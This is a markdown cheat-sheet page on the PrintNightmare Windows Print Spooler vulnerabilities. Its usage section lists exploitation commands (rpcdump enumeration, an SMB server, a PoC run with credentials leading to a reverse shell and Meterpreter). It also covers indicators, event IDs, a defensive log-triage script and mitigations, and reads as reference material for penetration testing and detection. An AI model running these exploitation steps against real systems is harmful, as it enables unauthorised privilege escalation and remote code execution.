killchain-compendium/exploit/windows/print_nightmare/print_nightmare.md

# Print Nightmare
* Privilege escalation using the Print Spooler service
* Located at `C:\Windows\System32\spoolsv.exe`
* Enabled by default
* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler
* The remote (RCE) path is reached over [DCE/RPC](https://wiki.wireshark.org/DCE/RPC), via `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`
## Usage
* Prepare a reverse shell
* Check whether the target exposes the spooler RPC interfaces (MS-RPRN / MS-PAR); `grep -E` is needed for the alternation
```sh
rpcdump.py @$TARGET_IP | grep -E 'MS-RPRN|MS-PAR'
```
* Start an SMB server
```sh
smbserver.py share . -smb2support
```
* Execute the PoC with credentials to elevate
```sh
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
```
* Use the Meterpreter session
## IOCs
* `RpcAddPrinterDriverEx()` is called
* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains the indicators
* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)
* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
* Event IDs `316, 808, 811, 31017, 7031`
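A defender-side triage of the PrintService events listed above, as an added example that is not part of the compendium: it flags Event ID 316 driver additions that reference a UNC path and escalates an 808/811 plug-in failure that follows one. The record layout and the `SAMPLE_EVENTS` messages are constructed, not real captures.

```python
"""Triage exported PrintService events for PrintNightmare indicators.

Assumption (example code): events from Microsoft-Windows-PrintService/Admin and
/Operational were exported into dicts with the keys time (epoch seconds),
channel, id and message. The messages below are constructed samples.
"""
import re

# Event IDs from the IOC list: 316 = driver added or updated,
# 808 / 811 = spooler plug-in module failures.
DRIVER_ADDED = 316
PLUGIN_FAILURE = {808, 811}
# A driver file pulled from a UNC path (a remote share) is the shape the PoC produces.
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+\\", re.IGNORECASE)
CORRELATION_WINDOW = 120  # seconds between a 316 and a following 808/811

SAMPLE_EVENTS = [  # constructed, not real log data
    {"time": 1000, "channel": "Microsoft-Windows-PrintService/Operational", "id": 316,
     "message": "Printer driver HP Universal for Windows x64 Version-3 was added or updated. "
                "Files:- UNIDRV.DLL, hpmdp.gpd."},
    {"time": 2000, "channel": "Microsoft-Windows-PrintService/Operational", "id": 316,
     "message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                "Files:- \\\\10.0.0.5\\share\\evil.dll, UNIDRV.DLL."},
    {"time": 2003, "channel": "Microsoft-Windows-PrintService/Admin", "id": 808,
     "message": "The print spooler failed to load a plug-in module "
                "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\evil.dll, error code 0x45A."},
]


def triage(events):
    """Return findings as (event index, severity, reason) for suspicious records."""
    findings = []
    ordered = sorted(enumerate(events), key=lambda e: e[1]["time"])
    last_suspicious_316 = None
    for idx, ev in ordered:
        if ev["id"] == DRIVER_ADDED and UNC_PATH.search(ev["message"]):
            last_suspicious_316 = ev["time"]
            findings.append((idx, "medium", "driver added from UNC path"))
        elif ev["id"] in PLUGIN_FAILURE:
            # A load failure right after a remote driver add is the strongest signal.
            recent = (last_suspicious_316 is not None
                      and ev["time"] - last_suspicious_316 <= CORRELATION_WINDOW)
            reason = f"spooler plug-in failure (event {ev['id']})"
            if recent:
                reason += ", shortly after remote driver add"
            findings.append((idx, "high" if recent else "low", reason))
    return findings


if __name__ == "__main__":
    for idx, sev, why in triage(SAMPLE_EVENTS):
        print(f"[{sev}] event #{idx} id={SAMPLE_EVENTS[idx]['id']}: {why}")
```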
## Mitigation
* [Microsoft guidance](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* Stop and disable the service (PowerShell)
```powershell
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
* Disable remote printing via Group Policy; the setting is under
```text
Computer Configuration/Administrative Templates/Printers
```